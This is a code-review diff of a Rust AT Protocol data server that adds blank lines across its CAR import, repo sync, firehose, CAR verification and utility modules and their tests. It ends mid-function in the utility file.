serde_json::json!({ ··· 386 let blob_refs = find_blob_refs(&record, 0); 387 assert!(blob_refs.is_empty()); 388 } 389 #[test] 390 fn test_find_blob_refs_depth_limit() { 391 fn deeply_nested(depth: usize) -> JsonValue {
··· 9 use thiserror::Error; 10 use tracing::debug; 11 use uuid::Uuid; 12 + 13 #[derive(Error, Debug)] 14 pub enum ImportError { 15 #[error("CAR parsing error: {0}")] ··· 37 #[error("DID mismatch: CAR is for {car_did}, but authenticated as {auth_did}")] 38 DidMismatch { car_did: String, auth_did: String }, 39 } 40 + 41 #[derive(Debug, Clone)] 42 pub struct BlobRef { 43 pub cid: String, 44 pub mime_type: Option<String>, 45 } 46 + 47 pub async fn parse_car(data: &[u8]) -> Result<(Cid, HashMap<Cid, Bytes>), ImportError> { 48 let cursor = Cursor::new(data); 49 let mut reader = CarReader::new(cursor) ··· 64 } 65 Ok((root, blocks)) 66 } 67 + 68 pub fn find_blob_refs_ipld(value: &Ipld, depth: usize) -> Vec<BlobRef> { 69 if depth > 32 { 70 return vec![]; ··· 95 _ => vec![], 96 } 97 } 98 + 99 pub fn find_blob_refs(value: &JsonValue, depth: usize) -> Vec<BlobRef> { 100 if depth > 32 { 101 return vec![]; ··· 129 _ => vec![], 130 } 131 } 132 + 133 pub fn extract_links(value: &Ipld, links: &mut Vec<Cid>) { 134 match value { 135 Ipld::Link(cid) => { ··· 148 _ => {} 149 } 150 } 151 + 152 #[derive(Debug)] 153 pub struct ImportedRecord { 154 pub collection: String, ··· 156 pub cid: Cid, 157 pub blob_refs: Vec<BlobRef>, 158 } 159 + 160 pub fn walk_mst( 161 blocks: &HashMap<Cid, Bytes>, 162 root_cid: &Cid, ··· 227 } 228 Ok(records) 229 } 230 + 231 pub struct CommitInfo { 232 pub rev: Option<String>, 233 pub prev: Option<String>, 234 } 235 + 236 fn extract_commit_info(commit: &Ipld) -> Result<(Cid, CommitInfo), ImportError> { 237 let obj = match commit { 238 Ipld::Map(m) => m, ··· 260 }); 261 Ok((data_cid, CommitInfo { rev, prev })) 262 } 263 + 264 pub async fn apply_import( 265 db: &PgPool, 266 user_id: Uuid, ··· 355 ); 356 Ok(records) 357 } 358 + 359 #[cfg(test)] 360 mod tests { 361 use super::*; 362 + 363 #[test] 364 fn test_find_blob_refs() { 365 let record = serde_json::json!({ ··· 390 ); 391 assert_eq!(blob_refs[0].mime_type, Some("image/jpeg".to_string())); 392 } 393 + 394 #[test] 395 fn test_find_blob_refs_no_blobs() { 396 let record = serde_json::json!({ ··· 400 let blob_refs = find_blob_refs(&record, 0); 401 assert!(blob_refs.is_empty()); 402 } 403 + 404 #[test] 405 fn test_find_blob_refs_depth_limit() { 406 fn deeply_nested(depth: usize) -> JsonValue {
+3
src/sync/listener.rs
··· 3 use sqlx::postgres::PgListener; 4 use std::sync::atomic::{AtomicI64, Ordering}; 5 use tracing::{debug, error, info, warn}; 6 static LAST_BROADCAST_SEQ: AtomicI64 = AtomicI64::new(0); 7 pub async fn start_sequencer_listener(state: AppState) { 8 let initial_seq = sqlx::query_scalar!("SELECT COALESCE(MAX(seq), 0) as max FROM repo_seq") 9 .fetch_one(&state.db) ··· 22 } 23 }); 24 } 25 async fn listen_loop(state: AppState) -> anyhow::Result<()> { 26 let mut listener = PgListener::connect_with(&state.db).await?; 27 listener.listen("repo_updates").await?;
··· 3 use sqlx::postgres::PgListener; 4 use std::sync::atomic::{AtomicI64, Ordering}; 5 use tracing::{debug, error, info, warn}; 6 + 7 static LAST_BROADCAST_SEQ: AtomicI64 = AtomicI64::new(0); 8 + 9 pub async fn start_sequencer_listener(state: AppState) { 10 let initial_seq = sqlx::query_scalar!("SELECT COALESCE(MAX(seq), 0) as max FROM repo_seq") 11 .fetch_one(&state.db) ··· 24 } 25 }); 26 } 27 + 28 async fn listen_loop(state: AppState) -> anyhow::Result<()> { 29 let mut listener = PgListener::connect_with(&state.db).await?; 30 listener.listen("repo_updates").await?;
+1
src/sync/mod.rs
··· 11 pub mod subscribe_repos; 12 pub mod util; 13 pub mod verify; 14 pub use blob::{get_blob, list_blobs}; 15 pub use commit::{get_latest_commit, get_repo_status, list_repos}; 16 pub use crawl::{notify_of_update, request_crawl};
··· 11 pub mod subscribe_repos; 12 pub mod util; 13 pub mod verify; 14 + 15 pub use blob::{get_blob, list_blobs}; 16 pub use commit::{get_latest_commit, get_repo_status, list_repos}; 17 pub use crawl::{notify_of_update, request_crawl};
+9
src/sync/repo.rs
··· 14 use std::io::Write; 15 use std::str::FromStr; 16 use tracing::error; 17 const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000; 18 #[derive(Deserialize)] 19 pub struct GetBlocksQuery { 20 pub did: String, 21 pub cids: String, 22 } 23 pub async fn get_blocks( 24 State(state): State<AppState>, 25 Query(query): Query<GetBlocksQuery>, ··· 81 ) 82 .into_response() 83 } 84 #[derive(Deserialize)] 85 pub struct GetRepoQuery { 86 pub did: String, 87 pub since: Option<String>, 88 } 89 pub async fn get_repo( 90 State(state): State<AppState>, 91 Query(query): Query<GetRepoQuery>, ··· 177 ) 178 .into_response() 179 } 180 fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) { 181 match value { 182 Ipld::Link(cid) => { ··· 195 _ => {} 196 } 197 } 198 #[derive(Deserialize)] 199 pub struct GetRecordQuery { 200 pub did: String, 201 pub collection: String, 202 pub rkey: String, 203 } 204 pub async fn get_record( 205 State(state): State<AppState>, 206 Query(query): Query<GetRecordQuery>, ··· 209 use jacquard_repo::mst::Mst; 210 use std::collections::BTreeMap; 211 use std::sync::Arc; 212 let repo_row = sqlx::query!( 213 r#" 214 SELECT r.repo_root_cid
··· 14 use std::io::Write; 15 use std::str::FromStr; 16 use tracing::error; 17 + 18 const MAX_REPO_BLOCKS_TRAVERSAL: usize = 20_000; 19 + 20 #[derive(Deserialize)] 21 pub struct GetBlocksQuery { 22 pub did: String, 23 pub cids: String, 24 } 25 + 26 pub async fn get_blocks( 27 State(state): State<AppState>, 28 Query(query): Query<GetBlocksQuery>, ··· 84 ) 85 .into_response() 86 } 87 + 88 #[derive(Deserialize)] 89 pub struct GetRepoQuery { 90 pub did: String, 91 pub since: Option<String>, 92 } 93 + 94 pub async fn get_repo( 95 State(state): State<AppState>, 96 Query(query): Query<GetRepoQuery>, ··· 182 ) 183 .into_response() 184 } 185 + 186 fn extract_links_ipld(value: &Ipld, stack: &mut Vec<Cid>) { 187 match value { 188 Ipld::Link(cid) => { ··· 201 _ => {} 202 } 203 } 204 + 205 #[derive(Deserialize)] 206 pub struct GetRecordQuery { 207 pub did: String, 208 pub collection: String, 209 pub rkey: String, 210 } 211 + 212 pub async fn get_record( 213 State(state): State<AppState>, 214 Query(query): Query<GetRecordQuery>, ··· 217 use jacquard_repo::mst::Mst; 218 use std::collections::BTreeMap; 219 use std::sync::Arc; 220 + 221 let repo_row = sqlx::query!( 222 r#" 223 SELECT r.repo_root_cid
+8
src/sync/subscribe_repos.rs
··· 10 use std::sync::atomic::{AtomicUsize, Ordering}; 11 use tokio::sync::broadcast::error::RecvError; 12 use tracing::{error, info, warn}; 13 const BACKFILL_BATCH_SIZE: i64 = 1000; 14 static SUBSCRIBER_COUNT: AtomicUsize = AtomicUsize::new(0); 15 #[derive(Deserialize)] 16 pub struct SubscribeReposParams { 17 pub cursor: Option<i64>, 18 } 19 #[axum::debug_handler] 20 pub async fn subscribe_repos( 21 ws: WebSocketUpgrade, ··· 24 ) -> Response { 25 ws.on_upgrade(move |socket| handle_socket(socket, state, params)) 26 } 27 async fn send_event( 28 socket: &mut WebSocket, 29 state: &AppState, ··· 33 socket.send(Message::Binary(bytes.into())).await?; 34 Ok(()) 35 } 36 pub fn get_subscriber_count() -> usize { 37 SUBSCRIBER_COUNT.load(Ordering::SeqCst) 38 } 39 async fn handle_socket(mut socket: WebSocket, state: AppState, params: SubscribeReposParams) { 40 let count = SUBSCRIBER_COUNT.fetch_add(1, Ordering::SeqCst) + 1; 41 crate::metrics::set_firehose_subscribers(count); ··· 45 crate::metrics::set_firehose_subscribers(count); 46 info!(subscribers = count, "Firehose subscriber disconnected"); 47 } 48 async fn handle_socket_inner(socket: &mut WebSocket, state: &AppState, params: SubscribeReposParams) -> Result<(), ()> { 49 if let Some(cursor) = params.cursor { 50 let mut current_cursor = cursor;
··· 10 use std::sync::atomic::{AtomicUsize, Ordering}; 11 use tokio::sync::broadcast::error::RecvError; 12 use tracing::{error, info, warn}; 13 + 14 const BACKFILL_BATCH_SIZE: i64 = 1000; 15 + 16 static SUBSCRIBER_COUNT: AtomicUsize = AtomicUsize::new(0); 17 + 18 #[derive(Deserialize)] 19 pub struct SubscribeReposParams { 20 pub cursor: Option<i64>, 21 } 22 + 23 #[axum::debug_handler] 24 pub async fn subscribe_repos( 25 ws: WebSocketUpgrade, ··· 28 ) -> Response { 29 ws.on_upgrade(move |socket| handle_socket(socket, state, params)) 30 } 31 + 32 async fn send_event( 33 socket: &mut WebSocket, 34 state: &AppState, ··· 38 socket.send(Message::Binary(bytes.into())).await?; 39 Ok(()) 40 } 41 + 42 pub fn get_subscriber_count() -> usize { 43 SUBSCRIBER_COUNT.load(Ordering::SeqCst) 44 } 45 + 46 async fn handle_socket(mut socket: WebSocket, state: AppState, params: SubscribeReposParams) { 47 let count = SUBSCRIBER_COUNT.fetch_add(1, Ordering::SeqCst) + 1; 48 crate::metrics::set_firehose_subscribers(count); ··· 52 crate::metrics::set_firehose_subscribers(count); 53 info!(subscribers = count, "Firehose subscriber disconnected"); 54 } 55 + 56 async fn handle_socket_inner(socket: &mut WebSocket, state: &AppState, params: SubscribeReposParams) -> Result<(), ()> { 57 if let Some(cursor) = params.cursor { 58 let mut current_cursor = cursor;
+10
src/sync/util.rs
··· 10 use std::io::Cursor; 11 use std::str::FromStr; 12 use tokio::io::AsyncWriteExt; 13 fn extract_rev_from_commit_bytes(commit_bytes: &[u8]) -> Option<String> { 14 Commit::from_cbor(commit_bytes).ok().map(|c| c.rev().to_string()) 15 } 16 async fn write_car_blocks( 17 commit_cid: Cid, 18 commit_bytes: Option<Bytes>, ··· 37 .map_err(|e| anyhow::anyhow!("flushing CAR buffer: {}", e))?; 38 Ok(buffer.into_inner()) 39 } 40 fn format_atproto_time(dt: chrono::DateTime<chrono::Utc>) -> String { 41 dt.format("%Y-%m-%dT%H:%M:%S%.3fZ").to_string() 42 } 43 fn format_identity_event(event: &SequencedEvent) -> Result<Vec<u8>, anyhow::Error> { 44 let frame = IdentityFrame { 45 did: event.did.clone(), ··· 56 serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?; 57 Ok(bytes) 58 } 59 fn format_account_event(event: &SequencedEvent) -> Result<Vec<u8>, anyhow::Error> { 60 let frame = AccountFrame { 61 did: event.did.clone(), ··· 73 serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?; 74 Ok(bytes) 75 } 76 async fn format_sync_event( 77 state: &AppState, 78 event: &SequencedEvent, ··· 101 serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?; 102 Ok(bytes) 103 } 104 pub async fn format_event_for_sending( 105 state: &AppState, 106 event: SequencedEvent, ··· 168 serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?; 169 Ok(bytes) 170 } 171 pub async fn prefetch_blocks_for_events( 172 state: &AppState, 173 events: &[SequencedEvent], ··· 206 } 207 Ok(blocks_map) 208 } 209 fn format_sync_event_with_prefetched( 210 event: &SequencedEvent, 211 prefetched: &HashMap<Cid, Bytes>, ··· 236 serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?; 237 Ok(bytes) 238 } 239 pub async fn format_event_with_prefetched_blocks( 240 event: SequencedEvent, 241 prefetched: &HashMap<Cid, Bytes>,
··· 10 use std::io::Cursor; 11 use std::str::FromStr; 12 use tokio::io::AsyncWriteExt; 13 + 14 fn extract_rev_from_commit_bytes(commit_bytes: &[u8]) -> Option<String> { 15 Commit::from_cbor(commit_bytes).ok().map(|c| c.rev().to_string()) 16 } 17 + 18 async fn write_car_blocks( 19 commit_cid: Cid, 20 commit_bytes: Option<Bytes>, ··· 39 .map_err(|e| anyhow::anyhow!("flushing CAR buffer: {}", e))?; 40 Ok(buffer.into_inner()) 41 } 42 + 43 fn format_atproto_time(dt: chrono::DateTime<chrono::Utc>) -> String { 44 dt.format("%Y-%m-%dT%H:%M:%S%.3fZ").to_string() 45 } 46 + 47 fn format_identity_event(event: &SequencedEvent) -> Result<Vec<u8>, anyhow::Error> { 48 let frame = IdentityFrame { 49 did: event.did.clone(), ··· 60 serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?; 61 Ok(bytes) 62 } 63 + 64 fn format_account_event(event: &SequencedEvent) -> Result<Vec<u8>, anyhow::Error> { 65 let frame = AccountFrame { 66 did: event.did.clone(), ··· 78 serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?; 79 Ok(bytes) 80 } 81 + 82 async fn format_sync_event( 83 state: &AppState, 84 event: &SequencedEvent, ··· 107 serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?; 108 Ok(bytes) 109 } 110 + 111 pub async fn format_event_for_sending( 112 state: &AppState, 113 event: SequencedEvent, ··· 175 serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?; 176 Ok(bytes) 177 } 178 + 179 pub async fn prefetch_blocks_for_events( 180 state: &AppState, 181 events: &[SequencedEvent], ··· 214 } 215 Ok(blocks_map) 216 } 217 + 218 fn format_sync_event_with_prefetched( 219 event: &SequencedEvent, 220 prefetched: &HashMap<Cid, Bytes>, ··· 245 serde_ipld_dagcbor::to_writer(&mut bytes, &frame)?; 246 Ok(bytes) 247 } 248 + 249 pub async fn format_event_with_prefetched_blocks( 250 event: SequencedEvent, 251 prefetched: &HashMap<Cid, Bytes>,
+13
src/sync/verify.rs
··· 8 use std::collections::HashMap; 9 use thiserror::Error; 10 use tracing::{debug, warn}; 11 #[derive(Error, Debug)] 12 pub enum VerifyError { 13 #[error("Invalid commit: {0}")] ··· 30 #[error("Invalid CBOR: {0}")] 31 InvalidCbor(String), 32 } 33 pub struct CarVerifier { 34 http_client: Client, 35 } 36 impl Default for CarVerifier { 37 fn default() -> Self { 38 Self::new() 39 } 40 } 41 impl CarVerifier { 42 pub fn new() -> Self { 43 Self { ··· 47 .unwrap_or_default(), 48 } 49 } 50 pub async fn verify_car( 51 &self, 52 expected_did: &str, ··· 80 prev: commit.prev().cloned(), 81 }) 82 } 83 async fn resolve_did_signing_key(&self, did: &str) -> Result<PublicKey<'static>, VerifyError> { 84 let did_doc = self.resolve_did_document(did).await?; 85 did_doc ··· 87 .map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))? 88 .ok_or(VerifyError::NoSigningKey) 89 } 90 async fn resolve_did_document(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> { 91 if did.starts_with("did:plc:") { 92 self.resolve_plc_did(did).await ··· 99 ))) 100 } 101 } 102 async fn resolve_plc_did(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> { 103 let plc_url = std::env::var("PLC_DIRECTORY_URL") 104 .unwrap_or_else(|_| "https://plc.directory".to_string()); ··· 123 .map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?; 124 Ok(doc.into_static()) 125 } 126 async fn resolve_web_did(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> { 127 let domain = did 128 .strip_prefix("did:web:") ··· 154 .map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?; 155 Ok(doc.into_static()) 156 } 157 fn verify_mst_structure( 158 &self, 159 data_cid: &Cid, 160 blocks: &HashMap<Cid, Bytes>, 161 ) -> Result<(), VerifyError> { 162 use ipld_core::ipld::Ipld; 163 let mut stack = vec![*data_cid]; 164 let mut visited = std::collections::HashSet::new(); 165 let mut node_count = 0; ··· 246 Ok(()) 247 } 248 } 249 #[derive(Debug, Clone)] 250 pub struct VerifiedCar { 251 pub did: String, ··· 253 pub data_cid: Cid, 254 pub prev: Option<Cid>, 255 } 256 #[cfg(test)] 257 #[path = "verify_tests.rs"] 258 mod tests;
··· 8 use std::collections::HashMap; 9 use thiserror::Error; 10 use tracing::{debug, warn}; 11 + 12 #[derive(Error, Debug)] 13 pub enum VerifyError { 14 #[error("Invalid commit: {0}")] ··· 31 #[error("Invalid CBOR: {0}")] 32 InvalidCbor(String), 33 } 34 + 35 pub struct CarVerifier { 36 http_client: Client, 37 } 38 + 39 impl Default for CarVerifier { 40 fn default() -> Self { 41 Self::new() 42 } 43 } 44 + 45 impl CarVerifier { 46 pub fn new() -> Self { 47 Self { ··· 51 .unwrap_or_default(), 52 } 53 } 54 + 55 pub async fn verify_car( 56 &self, 57 expected_did: &str, ··· 85 prev: commit.prev().cloned(), 86 }) 87 } 88 + 89 async fn resolve_did_signing_key(&self, did: &str) -> Result<PublicKey<'static>, VerifyError> { 90 let did_doc = self.resolve_did_document(did).await?; 91 did_doc ··· 93 .map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))? 94 .ok_or(VerifyError::NoSigningKey) 95 } 96 + 97 async fn resolve_did_document(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> { 98 if did.starts_with("did:plc:") { 99 self.resolve_plc_did(did).await ··· 106 ))) 107 } 108 } 109 + 110 async fn resolve_plc_did(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> { 111 let plc_url = std::env::var("PLC_DIRECTORY_URL") 112 .unwrap_or_else(|_| "https://plc.directory".to_string()); ··· 131 .map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?; 132 Ok(doc.into_static()) 133 } 134 + 135 async fn resolve_web_did(&self, did: &str) -> Result<DidDocument<'static>, VerifyError> { 136 let domain = did 137 .strip_prefix("did:web:") ··· 163 .map_err(|e| VerifyError::DidResolutionFailed(e.to_string()))?; 164 Ok(doc.into_static()) 165 } 166 + 167 fn verify_mst_structure( 168 &self, 169 data_cid: &Cid, 170 blocks: &HashMap<Cid, Bytes>, 171 ) -> Result<(), VerifyError> { 172 use ipld_core::ipld::Ipld; 173 + 174 let mut stack = vec![*data_cid]; 175 let mut visited = std::collections::HashSet::new(); 176 let mut node_count = 0; ··· 257 Ok(()) 258 } 259 } 260 + 261 #[derive(Debug, Clone)] 262 pub struct VerifiedCar { 263 pub did: String, ··· 265 pub data_cid: Cid, 266 pub prev: Option<Cid>, 267 } 268 + 269 #[cfg(test)] 270 #[path = "verify_tests.rs"] 271 mod tests;
+22
src/sync/verify_tests.rs
··· 5 use cid::Cid; 6 use sha2::{Digest, Sha256}; 7 use std::collections::HashMap; 8 fn make_cid(data: &[u8]) -> Cid { 9 let mut hasher = Sha256::new(); 10 hasher.update(data); ··· 12 let multihash = multihash::Multihash::wrap(0x12, &hash).unwrap(); 13 Cid::new_v1(0x71, multihash) 14 } 15 #[test] 16 fn test_verifier_creation() { 17 let _verifier = CarVerifier::new(); 18 } 19 #[test] 20 fn test_verify_error_display() { 21 let err = VerifyError::DidMismatch { ··· 31 let err = VerifyError::MstValidationFailed("test error".to_string()); 32 assert!(err.to_string().contains("test error")); 33 } 34 #[test] 35 fn test_mst_validation_missing_root_block() { 36 let verifier = CarVerifier::new(); ··· 41 let err = result.unwrap_err(); 42 assert!(matches!(err, VerifyError::BlockNotFound(_))); 43 } 44 #[test] 45 fn test_mst_validation_invalid_cbor() { 46 let verifier = CarVerifier::new(); ··· 53 let err = result.unwrap_err(); 54 assert!(matches!(err, VerifyError::InvalidCbor(_))); 55 } 56 #[test] 57 fn test_mst_validation_empty_node() { 58 let verifier = CarVerifier::new(); ··· 65 let result = verifier.verify_mst_structure(&cid, &blocks); 66 assert!(result.is_ok()); 67 } 68 #[test] 69 fn test_mst_validation_missing_left_pointer() { 70 use ipld_core::ipld::Ipld; 71 let verifier = CarVerifier::new(); 72 let missing_left_cid = make_cid(b"missing left"); 73 let node = Ipld::Map(std::collections::BTreeMap::from([ ··· 84 assert!(matches!(err, VerifyError::BlockNotFound(_))); 85 assert!(err.to_string().contains("left pointer")); 86 } 87 #[test] 88 fn test_mst_validation_missing_subtree() { 89 use ipld_core::ipld::Ipld; 90 let verifier = CarVerifier::new(); 91 let missing_subtree_cid = make_cid(b"missing subtree"); 92 let record_cid = make_cid(b"record"); ··· 109 assert!(matches!(err, VerifyError::BlockNotFound(_))); 110 assert!(err.to_string().contains("subtree")); 111 } 112 #[test] 113 fn test_mst_validation_unsorted_keys() { 114 use ipld_core::ipld::Ipld; 115 let verifier = CarVerifier::new(); 116 let record_cid = make_cid(b"record"); 117 let entry1 = Ipld::Map(std::collections::BTreeMap::from([ ··· 137 assert!(matches!(err, VerifyError::MstValidationFailed(_))); 138 assert!(err.to_string().contains("sorted")); 139 } 140 #[test] 141 fn test_mst_validation_sorted_keys_ok() { 142 use ipld_core::ipld::Ipld; 143 let verifier = CarVerifier::new(); 144 let record_cid = make_cid(b"record"); 145 let entry1 = Ipld::Map(std::collections::BTreeMap::from([ ··· 167 let result = verifier.verify_mst_structure(&cid, &blocks); 168 assert!(result.is_ok()); 169 } 170 #[test] 171 fn test_mst_validation_with_valid_left_pointer() { 172 use ipld_core::ipld::Ipld; 173 let verifier = CarVerifier::new(); 174 let left_node = Ipld::Map(std::collections::BTreeMap::from([ 175 ("e".to_string(), Ipld::List(vec![])), ··· 188 let result = verifier.verify_mst_structure(&root_cid, &blocks); 189 assert!(result.is_ok()); 190 } 191 #[test] 192 fn test_mst_validation_cycle_detection() { 193 let verifier = CarVerifier::new(); ··· 200 let result = verifier.verify_mst_structure(&cid, &blocks); 201 assert!(result.is_ok()); 202 } 203 #[tokio::test] 204 async fn test_unsupported_did_method() { 205 let verifier = CarVerifier::new(); ··· 209 assert!(matches!(err, VerifyError::DidResolutionFailed(_))); 210 assert!(err.to_string().contains("Unsupported")); 211 } 212 #[test] 213 fn test_mst_validation_with_prefix_compression() { 214 use ipld_core::ipld::Ipld; 215 let verifier = CarVerifier::new(); 216 let record_cid = make_cid(b"record"); 217 let entry1 = Ipld::Map(std::collections::BTreeMap::from([ ··· 239 let result = verifier.verify_mst_structure(&cid, &blocks); 240 assert!(result.is_ok(), "Prefix-compressed keys should be validated correctly"); 241 } 242 #[test] 243 fn test_mst_validation_prefix_compression_unsorted() { 244 use ipld_core::ipld::Ipld; 245 let verifier = CarVerifier::new(); 246 let record_cid = make_cid(b"record"); 247 let entry1 = Ipld::Map(std::collections::BTreeMap::from([
··· 5 use cid::Cid; 6 use sha2::{Digest, Sha256}; 7 use std::collections::HashMap; 8 + 9 fn make_cid(data: &[u8]) -> Cid { 10 let mut hasher = Sha256::new(); 11 hasher.update(data); ··· 13 let multihash = multihash::Multihash::wrap(0x12, &hash).unwrap(); 14 Cid::new_v1(0x71, multihash) 15 } 16 + 17 #[test] 18 fn test_verifier_creation() { 19 let _verifier = CarVerifier::new(); 20 } 21 + 22 #[test] 23 fn test_verify_error_display() { 24 let err = VerifyError::DidMismatch { ··· 34 let err = VerifyError::MstValidationFailed("test error".to_string()); 35 assert!(err.to_string().contains("test error")); 36 } 37 + 38 #[test] 39 fn test_mst_validation_missing_root_block() { 40 let verifier = CarVerifier::new(); ··· 45 let err = result.unwrap_err(); 46 assert!(matches!(err, VerifyError::BlockNotFound(_))); 47 } 48 + 49 #[test] 50 fn test_mst_validation_invalid_cbor() { 51 let verifier = CarVerifier::new(); ··· 58 let err = result.unwrap_err(); 59 assert!(matches!(err, VerifyError::InvalidCbor(_))); 60 } 61 + 62 #[test] 63 fn test_mst_validation_empty_node() { 64 let verifier = CarVerifier::new(); ··· 71 let result = verifier.verify_mst_structure(&cid, &blocks); 72 assert!(result.is_ok()); 73 } 74 + 75 #[test] 76 fn test_mst_validation_missing_left_pointer() { 77 use ipld_core::ipld::Ipld; 78 + 79 let verifier = CarVerifier::new(); 80 let missing_left_cid = make_cid(b"missing left"); 81 let node = Ipld::Map(std::collections::BTreeMap::from([ ··· 92 assert!(matches!(err, VerifyError::BlockNotFound(_))); 93 assert!(err.to_string().contains("left pointer")); 94 } 95 + 96 #[test] 97 fn test_mst_validation_missing_subtree() { 98 use ipld_core::ipld::Ipld; 99 + 100 let verifier = CarVerifier::new(); 101 let missing_subtree_cid = make_cid(b"missing subtree"); 102 let record_cid = make_cid(b"record"); ··· 119 assert!(matches!(err, VerifyError::BlockNotFound(_))); 120 assert!(err.to_string().contains("subtree")); 121 } 122 + 123 #[test] 124 fn test_mst_validation_unsorted_keys() { 125 use ipld_core::ipld::Ipld; 126 + 127 let verifier = CarVerifier::new(); 128 let record_cid = make_cid(b"record"); 129 let entry1 = Ipld::Map(std::collections::BTreeMap::from([ ··· 149 assert!(matches!(err, VerifyError::MstValidationFailed(_))); 150 assert!(err.to_string().contains("sorted")); 151 } 152 + 153 #[test] 154 fn test_mst_validation_sorted_keys_ok() { 155 use ipld_core::ipld::Ipld; 156 + 157 let verifier = CarVerifier::new(); 158 let record_cid = make_cid(b"record"); 159 let entry1 = Ipld::Map(std::collections::BTreeMap::from([ ··· 181 let result = verifier.verify_mst_structure(&cid, &blocks); 182 assert!(result.is_ok()); 183 } 184 + 185 #[test] 186 fn test_mst_validation_with_valid_left_pointer() { 187 use ipld_core::ipld::Ipld; 188 + 189 let verifier = CarVerifier::new(); 190 let left_node = Ipld::Map(std::collections::BTreeMap::from([ 191 ("e".to_string(), Ipld::List(vec![])), ··· 204 let result = verifier.verify_mst_structure(&root_cid, &blocks); 205 assert!(result.is_ok()); 206 } 207 + 208 #[test] 209 fn test_mst_validation_cycle_detection() { 210 let verifier = CarVerifier::new(); ··· 217 let result = verifier.verify_mst_structure(&cid, &blocks); 218 assert!(result.is_ok()); 219 } 220 + 221 #[tokio::test] 222 async fn test_unsupported_did_method() { 223 let verifier = CarVerifier::new(); ··· 227 assert!(matches!(err, VerifyError::DidResolutionFailed(_))); 228 assert!(err.to_string().contains("Unsupported")); 229 } 230 + 231 #[test] 232 fn test_mst_validation_with_prefix_compression() { 233 use ipld_core::ipld::Ipld; 234 + 235 let verifier = CarVerifier::new(); 236 let record_cid = make_cid(b"record"); 237 let entry1 = Ipld::Map(std::collections::BTreeMap::from([ ··· 259 let result = verifier.verify_mst_structure(&cid, &blocks); 260 assert!(result.is_ok(), "Prefix-compressed keys should be validated correctly"); 261 } 262 + 263 #[test] 264 fn test_mst_validation_prefix_compression_unsorted() { 265 use ipld_core::ipld::Ipld; 266 + 267 let verifier = CarVerifier::new(); 268 let record_cid = make_cid(b"record"); 269 let entry1 = Ipld::Map(std::collections::BTreeMap::from([
+16
src/util.rs
··· 1 use rand::Rng; 2 use sqlx::PgPool; 3 use uuid::Uuid; 4 const BASE32_ALPHABET: &str = "abcdefghijklmnopqrstuvwxyz234567"; 5 pub fn generate_token_code() -> String { 6 generate_token_code_parts(2, 5) 7 } 8 pub fn generate_token_code_parts(parts: usize, part_len: usize) -> String { 9 let mut rng = rand::thread_rng(); 10 let chars: Vec<char> = BASE32_ALPHABET.chars().collect(); 11 (0..parts) 12 .map(|_| { 13 (0..part_len) ··· 17 .collect::<Vec<_>>() 18 .join("-") 19 } 20 #[derive(Debug)] 21 pub enum DbLookupError { 22 NotFound, 23 DatabaseError(sqlx::Error), 24 } 25 impl From<sqlx::Error> for DbLookupError { 26 fn from(e: sqlx::Error) -> Self { 27 DbLookupError::DatabaseError(e) 28 } 29 } 30 pub async fn get_user_id_by_did(db: &PgPool, did: &str) -> Result<Uuid, DbLookupError> { 31 sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) 32 .fetch_optional(db) 33 .await? 34 .ok_or(DbLookupError::NotFound) 35 } 36 pub struct UserInfo { 37 pub id: Uuid, 38 pub did: String, 39 pub handle: String, 40 } 41 pub async fn get_user_by_did(db: &PgPool, did: &str) -> Result<UserInfo, DbLookupError> { 42 sqlx::query_as!( 43 UserInfo, ··· 48 .await? 49 .ok_or(DbLookupError::NotFound) 50 } 51 pub async fn get_user_by_identifier(db: &PgPool, identifier: &str) -> Result<UserInfo, DbLookupError> { 52 sqlx::query_as!( 53 UserInfo, ··· 58 .await? 59 .ok_or(DbLookupError::NotFound) 60 } 61 #[cfg(test)] 62 mod tests { 63 use super::*; 64 #[test] 65 fn test_generate_token_code() { 66 let code = generate_token_code(); 67 assert_eq!(code.len(), 11); 68 assert!(code.contains('-')); 69 let parts: Vec<&str> = code.split('-').collect(); 70 assert_eq!(parts.len(), 2); 71 assert_eq!(parts[0].len(), 5); 72 assert_eq!(parts[1].len(), 5); 73 for c in code.chars() { 74 if c != '-' { 75 assert!(BASE32_ALPHABET.contains(c)); 76 } 77 } 78 } 79 #[test] 80 fn test_generate_token_code_parts() { 81 let code = generate_token_code_parts(3, 4); 82 let parts: Vec<&str> = code.split('-').collect(); 83 assert_eq!(parts.len(), 3); 84 for part in parts { 85 assert_eq!(part.len(), 4); 86 }
··· 1 use rand::Rng; 2 use sqlx::PgPool; 3 use uuid::Uuid; 4 + 5 const BASE32_ALPHABET: &str = "abcdefghijklmnopqrstuvwxyz234567"; 6 + 7 pub fn generate_token_code() -> String { 8 generate_token_code_parts(2, 5) 9 } 10 + 11 pub fn generate_token_code_parts(parts: usize, part_len: usize) -> String { 12 let mut rng = rand::thread_rng(); 13 let chars: Vec<char> = BASE32_ALPHABET.chars().collect(); 14 + 15 (0..parts) 16 .map(|_| { 17 (0..part_len) ··· 21 .collect::<Vec<_>>() 22 .join("-") 23 } 24 + 25 #[derive(Debug)] 26 pub enum DbLookupError { 27 NotFound, 28 DatabaseError(sqlx::Error), 29 } 30 + 31 impl From<sqlx::Error> for DbLookupError { 32 fn from(e: sqlx::Error) -> Self { 33 DbLookupError::DatabaseError(e) 34 } 35 } 36 + 37 pub async fn get_user_id_by_did(db: &PgPool, did: &str) -> Result<Uuid, DbLookupError> { 38 sqlx::query_scalar!("SELECT id FROM users WHERE did = $1", did) 39 